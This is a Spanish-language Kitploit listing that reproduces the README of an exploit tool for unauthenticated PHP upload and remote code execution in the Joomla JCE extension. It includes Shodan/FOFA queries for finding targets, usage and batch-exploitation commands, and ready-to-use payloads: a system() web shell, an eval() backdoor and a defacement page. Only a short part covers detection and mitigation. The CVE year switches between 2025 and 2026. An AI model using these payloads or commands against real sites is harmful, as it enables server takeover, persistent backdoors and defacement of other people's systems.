Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Exploit de RCE no autenticado para Joomla JCE < 2.9.99.5 | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Exploit de RCE no autenticado para Joomla JCE < 2.9.99.5

Ver Repositorio
4150hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Logotipo de Joomla

CVE-2026-48907 - Joomla! JCE RCE sin autenticación

Extensión Joomla! JCE < 2.9.99.5 - Carga arbitraria de archivos PHP sin autenticación y ejecución remota de código

License: MIT Python 3.6+ Security Shodan FOFA


🔎 Consultas en motores de búsqueda

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 Resumen

Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2026-48907, una vulnerabilidad crítica en la extensión Joomla! JCE (Joomla Content Editor) en versiones anteriores a 2.9.99.5. La vulnerabilidad permite a atacantes no autenticados cargar archivos PHP arbitrarios mediante la funcionalidad de importación de perfiles de JCE, lo que lleva a la ejecución remota de código (RCE).

⚠️ Aviso legal

Esta herramienta es solo para fines educativos y de pruebas autorizadas.

  • Úsela solo en sistemas que posea o tenga permiso explícito para probar
  • El autor no se hace responsable de ningún uso indebido o actividades ilegales
  • Obtenga siempre la autorización adecuada antes de realizar pruebas

🔍 Detalles de la vulnerabilidad

PropiedadValor
CVE IDCVE-2026-48907
ProductoExtensión Joomla! JCE
Versiones afectadas< 2.9.99.5
Tipo de vulnerabilidadCarga de archivos PHP sin autenticación → RCE
Puntuación CVSS9.8 (Crítica)
Vector de ataqueRed
AutenticaciónNinguna requerida
ImpactoCompromiso total del sistema

Cómo funciona

  1. Extracción del token CSRF: El exploit primero extrae el token CSRF de la página principal del objetivo
  2. Abuso de la importación de perfiles: Aprovecha la funcionalidad de importación de perfiles de JCE (index.php?option=com_jce&task=profiles.import)
  3. Subida de archivo PHP: Carga un archivo PHP malicioso disfrazado de archivo XML de perfil
  4. Ejecución de código: El archivo PHP subido se coloca en el directorio /tmp/ y se puede ejecutar mediante acceso directo

🚀 Características

  • ✅ Subir cualquier archivo PHP: Cargue shells web, puertas traseras o páginas de desfiguración personalizadas (basadas en PHP)
  • ✅ Procesamiento por lotes: Escanee y explote múltiples objetivos desde un archivo
  • ✅ Detección automática de token CSRF: Extrae automáticamente los tokens CSRF
  • ✅ Modo detallado: Salida detallada para depuración
  • ✅ Exportación de resultados: Guarde las URL de subida exitosa en un archivo

📦 Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Instalar dependencias requeridas
pip3 install requests urllib3

Requisitos

  • Python 3.6 o superior
  • Librería requests
  • Librería urllib3

🎯 Uso

Sintaxis básica

root@kitploit:~
python3 CVE-2025-48907.py -u <URL_OBJETIVO> -F <ARCHIVO_PHP_A_SUBIR>

Ejemplos

Subir un shell web PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

Subir una página de desfiguración PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

Subir una puerta trasera PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

Explotación por lotes con archivo de objetivos

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

Con salida detallada y guardado de resultados

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

Argumentos de línea de comandos

ArgumentoRequeridoDescripción
-u, --urlSí*URL de un solo objetivo (ej., http://target.com)
-f, --fileSí*Archivo que contiene una lista de URLs objetivo (una por línea)
-F, --upload-fileSíArchivo PHP a subir (shell, puerta trasera, página de desfiguración)
-v, --verboseNoHabilitar salida detallada para depuración
-o, --outputNoGuardar URLs de subida exitosa en un archivo

* Se debe proporcionar -u o -f

Formato de archivo de objetivos

Cree un archivo targets.txt con una URL por línea:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Los comentarios son ignorados
https://example-joomla.com

🔧 Creación de cargas útiles PHP

Todas las cargas útiles deben ser archivos PHP ya que el exploit sube código PHP que se ejecutará en el servidor.

Shell web PHP

Cree shell.php:

root@kitploit:~
<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

Página de desfiguración PHP

Cree deface.php:

root@kitploit:~
<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

Puerta trasera PHP (Mínima)

Cree backdoor.php:

root@kitploit:~
<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 Ejemplo de salida

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Extensión Joomla! JCE < 2.9.99.5 RCE sin autenticación
Autor : 0xgh057r3c0n (Subida de archivos PHP)

[*] Cargados 3 objetivo(s)

[*] Objetivo 1/3
[*] ==================================================
[+] Objetivo: http://target-joomla.com
[+] Obteniendo token CSRF...
[+] Token CSRF: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Subiendo archivo PHP: cve-2026-48907-1234.xml.php
[+] ¡Perfil importado exitosamente!
[+] Probando archivo PHP subido...

============================================================
[!!!!!] ¡ARCHIVO PHP SUBIDO EXITOSAMENTE!
[!!!!!] ¡El servidor ES VULNERABLE a CVE-2025-48907!
============================================================

[+] Vea su archivo PHP subido: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Acceso rápido:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ Detección y Mitigación

Cómo detectar

  • Verifique la presencia de archivos PHP sospechosos en el directorio /tmp/
  • Monitoree la actividad de importación de perfiles JCE en los registros
  • Busque solicitudes inesperadas a index.php?option=com_jce&task=profiles.import
  • Revise la existencia de archivos con extensión .xml.php en /tmp/
  • Monitoree la ejecución inusual de PHP desde el directorio /tmp/

Pasos de mitigación

  1. Actualizar la extensión JCE:

    • Actualice a la versión 2.9.99.5 o superior
    • Descargue desde: Sitio web oficial de JCE
  2. Soluciones temporales:

    • Deshabilite la extensión JCE si no es necesaria
    • Implemente reglas de Firewall de Aplicaciones Web (WAF)
    • Restrinja la ejecución de PHP en el directorio /tmp/
    • Deshabilite allow_url_fopen si no es necesario
  3. Acciones posteriores al compromiso:

    • Elimine los archivos PHP subidos de /tmp/
    • Audite el sistema en busca de puertas traseras
    • Restablezca todas las credenciales (admin de Joomla, FTP, hosting)
    • Revise los registros del sistema en busca de accesos no autorizados
    • Verifique la existencia de otros archivos comprometidos

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

License: MIT


🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dude en enviar una solicitud de extracción.

  1. Haga un fork del repositorio
  2. Cree su rama de funcionalidad (git checkout -b feature/AmazingFeature)
  3. Realice sus cambios (git commit -m 'Add some AmazingFeature')
  4. Suba los cambios (git push origin feature/AmazingFeature)
  5. Abra una solicitud de extracción

⭐ Historial de estrellas

Si encuentra útil esta herramienta, considere darle una estrella ⭐ en GitHub!


📞 Contacto y soporte

  • Autor: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • Incidencias: Reportar un error

🔗 Referencias

  • NVD - CVE-2025-48907
  • Sitio web oficial de JCE
  • Centro de seguridad de Joomla!

Hecho con ❤️ por 0xgh057r3c0n
Descargar herramienta